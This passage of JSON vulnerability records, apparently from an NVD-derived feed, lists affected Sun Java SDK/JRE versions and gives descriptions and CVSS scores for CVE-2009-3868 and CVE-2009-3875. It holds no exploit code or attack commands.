"cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 does not properly parse color profiles, which allows remote attackers to gain privileges via a crafted image file, aka Bug Id 6862970.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3868", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3868"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3868", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "The MessageDigest.isEqual function in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof HMAC-based digital signatures, and possibly bypass authentication, via unspecified vectors related to \"timing attack vulnerabilities,\" aka Bug Id 6863503.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3875", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3875"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", 